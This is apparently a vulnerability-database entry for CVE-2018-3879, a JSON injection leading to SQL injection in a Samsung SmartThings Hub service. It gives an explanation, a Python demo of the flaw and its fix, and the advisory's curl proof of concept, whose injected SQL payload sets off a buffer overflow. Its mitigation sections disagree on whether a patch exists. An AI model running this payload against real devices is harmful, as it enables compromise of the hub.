VYPR
Unrated severity · NVD Advisory · Published Aug 23, 2018 · Updated Sep 17, 2024

CVE-2018-3879

Description

An exploitable JSON injection vulnerability exists in the credentials handler of video-core's HTTP server of Samsung SmartThings Hub STH-ETH-250 devices with firmware version 0.20.17. The video-core process incorrectly parses the user-controlled JSON payload, leading to a JSON injection which in turn leads to a SQL injection in the video-core database. An attacker can send a series of HTTP requests to trigger this vulnerability.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A JSON injection in the credentials handler of Samsung SmartThings Hub STH-ETH-250 firmware 0.20.17 leads to SQL injection, allowing authenticated attackers to execute arbitrary SQL commands.

Vulnerability

The vulnerability resides in the credentials handler of the video-core HTTP server on Samsung SmartThings Hub STH-ETH-250 devices running firmware version 0.20.17. The video-core process incorrectly parses user-controlled JSON payloads, resulting in a JSON injection that subsequently enables SQL injection into the video-core database. This issue is classified as CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') [1].

Exploitation

An attacker with network access and low privileges (authenticated user) can exploit this vulnerability by sending a series of crafted HTTP requests to the credentials handler. The malicious JSON payload is parsed incorrectly, allowing the attacker to inject arbitrary SQL commands into the video-core database. No user interaction beyond authentication is required [1].

Impact

Successful exploitation allows the attacker to execute arbitrary SQL statements against the video-core database. This can lead to disclosure, modification, or deletion of sensitive data, and potentially compromise the confidentiality, integrity, and availability of the hub. The CVSSv3 score is 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) [1].

Mitigation

As of the publication date (2018-08-23), no firmware update or workaround has been disclosed in the available reference [1]. Users are advised to monitor Samsung's security advisories for future patches. This CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0

No patches discovered yet.

Vulnerability mechanics

Root cause

"No sanitization is performed on user-controlled JSON parameter values before they are re-serialized via sprintf into a new JSON string, which is then used to construct a SQL query, allowing JSON injection that leads to SQL injection."

Attack vector

An attacker sends a POST request to http://127.0.0.1:3000/credentials with a JSON body where string values use single quotes instead of double quotes. Because the json-c library was compiled with JSON_TOKENER_STRICT=0, single-quoted strings are accepted. When the parameters are later re-serialized via sprintf into a new JSON string, the unsanitized single-quoted content can break out of the JSON string context and inject arbitrary JSON keys. These injected keys become column names in the generated SQL UPDATE query, and because sqlite3_exec allows stacked queries, a semicolon in an injected key lets the attacker execute arbitrary SQL statements. The request can be delivered by anyone who can impersonate the remote SmartThings servers (relayed through hubCore), by a malicious SmartApp running inside hubCore (which can make localhost connections), or potentially through the SmartThings mobile application if the attacker possesses a valid OAuth bearer token [ref_id=1].

Affected code

The vulnerability resides in the credentials handler of the video-core HTTP server, specifically in function sub_3E4EC which parses the JSON POST body for the "/credentials" path. The JSON string is parsed with json_tokener_parse, then parameters are extracted and later re-serialized via sprintf into a new JSON string using format string [8] without any sanitization. The resulting JSON is passed to db_add (sub_28874) which generates and executes a SQL UPDATE query via sqlite3_exec.

What the fix does

The advisory states the vendor patched the vulnerability on 2018-07-17, but no patch diff is included in the bundle. The root cause is the lack of sanitization on user-controlled JSON parameters throughout the parsing and re-serialization logic. To close the vulnerability, the vendor would need to either (a) properly escape or validate all parameter values before inserting them into the sprintf format string, (b) enforce strict JSON parsing (JSON_TOKENER_STRICT=1) to reject single-quoted strings, or (c) use parameterized queries instead of building SQL statements via string concatenation from JSON input [ref_id=1].
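The two defects described above (unescaped re-serialization of parsed values, and JSON keys becoming column names in a concatenated UPDATE) and fix options (a) and (c) can be shown side by side. The following is an added example written for this page, not video-core's code or the vendor's patch: it uses Python's json and sqlite3 modules in place of json-c and sqlite3_exec, a hypothetical four-column credentials table, and constructed request parameters as the lenient parser would hand them over. A value carrying a double quote is enough to show the breakout in the sprintf-style path; the hardened path escapes through the JSON library, allow-lists column names, and binds values as parameters.

```python
import json
import sqlite3

# Constructed stand-in for the video-core credentials table. The column
# names are hypothetical; they are not the device's real schema.
SCHEMA = ("CREATE TABLE credentials ("
          "_id INTEGER PRIMARY KEY, accessKey TEXT, secretKey TEXT, "
          "sessionToken TEXT, bucket TEXT)")
FIELDS = ("accessKey", "secretKey", "sessionToken", "bucket")

# Constructed request parameters, as a lenient parser would hand them over.
# sessionToken carries a double quote, which is all a value needs to escape
# the template once it is pasted in unescaped.
CLEAN = {"accessKey": "AK", "secretKey": "SK", "sessionToken": "tok", "bucket": "b"}
INJECT = dict(CLEAN, sessionToken='tok","injected":"x')


def reserialize_vulnerable(params):
    """sprintf-style template: values are pasted in without JSON escaping."""
    template = '{"accessKey":"%s","secretKey":"%s","sessionToken":"%s","bucket":"%s"}'
    return template % tuple(params[f] for f in FIELDS)


def reserialize_fixed(params):
    """Let the JSON library serialize, so quotes inside values are escaped."""
    return json.dumps({f: params[f] for f in FIELDS})


def build_update_vulnerable(json_text):
    """Keys of the re-parsed JSON become column names; values are concatenated."""
    obj = json.loads(json_text)
    assignments = ", ".join("%s='%s'" % (k, v) for k, v in obj.items())
    return "UPDATE credentials SET %s WHERE _id=1" % assignments


def update_fixed(conn, json_text):
    """Allow-list the column names and bind every value as a parameter."""
    obj = json.loads(json_text)
    unknown = set(obj) - set(FIELDS)
    if unknown:
        # An injected key never reaches the SQL text.
        raise ValueError("unexpected keys: %s" % sorted(unknown))
    cols = [f for f in FIELDS if f in obj]
    sql = "UPDATE credentials SET %s WHERE _id=?" % ", ".join("%s=?" % c for c in cols)
    conn.execute(sql, [obj[c] for c in cols] + [1])
    return conn.execute("SELECT sessionToken FROM credentials WHERE _id=1").fetchone()[0]


def fresh_db():
    """In-memory database with one credentials row to update."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.execute("INSERT INTO credentials (_id) VALUES (1)")
    return conn


def keys_after_roundtrip(reserialize, params):
    """Which keys survive parse -> re-serialize -> parse."""
    return sorted(json.loads(reserialize(params)))


if __name__ == "__main__":
    # Vulnerable path: a fifth key appears and becomes a column assignment.
    print(keys_after_roundtrip(reserialize_vulnerable, INJECT))
    print(build_update_vulnerable(reserialize_vulnerable(INJECT)))
    # Fixed path: only the four expected keys, value stored verbatim.
    print(keys_after_roundtrip(reserialize_fixed, INJECT))
    print(update_fixed(fresh_db(), reserialize_fixed(INJECT)))
```

Run as a script, the vulnerable round trip reports five keys and emits `injected='x'` inside the UPDATE, whereas the fixed round trip keeps the quote inside the sessionToken string and the allow-list rejects anything that is not a known column. Option (b) from the text, strict parsing, is orthogonal: it only removes the single-quote trick, while escaping on output and parameter binding remove the injection regardless of how the input was tokenized.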

Preconditions

  • network: Attacker must be able to send HTTP requests to the video-core process on port 3000 (localhost). This can be achieved by impersonating the remote SmartThings servers, running a malicious SmartApp inside hubCore, or potentially via the mobile app with a valid OAuth token.
  • config: The json-c library must be compiled with JSON_TOKENER_STRICT=0 (which is the case in firmware 0.20.17), allowing single-quoted strings.
  • input: The POST body must contain the required JSON parameters: s3.secretKey, s3.accessKey, s3.sessionToken, s3.bucket, s3.directory, s3.region, and videoHostUrl.

Reproduction

The following proof of concept from the advisory demonstrates the vulnerability by crashing the video-core process [ref_id=1]:

```
# using curl from inside the hub, but the same request could be sent using a SmartApp
$ sInj='","_id=0 where 1=2;insert into camera values (123,replace(substr(quote(zeroblob((10000 + 1) / 2)), 3, 10000), \"0\", \"A\"),1,1,1,1,1,1,1,1,1,1,1,1,1,1);--":"'
$ curl -X POST 'http://127.0.0.1:3000/credentials' -d "{'s3':{'accessKey':'','secretKey':'','directory':'','region':'','bucket':'','sessionToken':'${sInj}'},'videoHostUrl':'127.0.0.1/'}"
$ curl -X DELETE "http://127.0.0.1:3000/cameras/123"
```

The first curl injects a SQL query via the sessionToken field using single quotes to break out of the JSON string. The injected SQL creates a camera record with an oversized locationId column. The second curl triggers a stack-based buffer overflow when reading that oversized field (TALOS-2018-0557).

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 1

News mentions: 0

No linked articles in our index yet.